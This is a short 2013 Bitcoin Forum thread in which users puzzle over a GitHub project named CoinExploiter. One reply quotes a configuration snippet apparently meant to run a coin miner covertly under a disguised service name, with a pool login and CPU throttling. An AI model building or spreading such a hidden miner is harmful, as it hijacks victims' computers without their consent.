Bitcoin Forum

Alternate cryptocurrencies => Altcoin Discussion => Topic started by: Scooby903 on December 16, 2013, 11:11:24 PM



Title: The fuck is this?
Post by: Scooby903 on December 16, 2013, 11:11:24 PM
https://github.com/Birgitbonander/CoinExploiter

Just browsing around Github and found this...don't know to compile on Windows and probably wouldn't anyway, lol


Title: Re: The fuck is this?
Post by: BrewCrewFan on December 16, 2013, 11:13:58 PM
https://github.com/Birgitbonander/CoinExploiter

Just browsing around Github and found this...don't know to compile on Windows and probably wouldn't anyway, lol
ITS A TRAPPP!!!! lol jk


Title: Re: The fuck is this?
Post by: infinitybo on December 16, 2013, 11:18:14 PM
No really you should not try if you don't know ;D


Title: Re: The fuck is this?
Post by: peterlustig on December 16, 2013, 11:25:16 PM
pretty much explains itself:
Code:
$serviceName = "ASDFService"
$processName = "coin-miner.exe"
$filePath = "C:\Program Files (x86)\Ufasoft\Coin\coin-miner.exe"
$poolName = "birgitbonander.1:x@pool1.eu.multipool.us"
$port = 7777
$nProcessors = Floor(EnvGet("NUMBER_OF_PROCESSORS")/3)
$cmdString = """" & $filePath & """" & " -o stratum+tcp://" & $poolName & ":" & $port & " -g no -t " & $nProcessors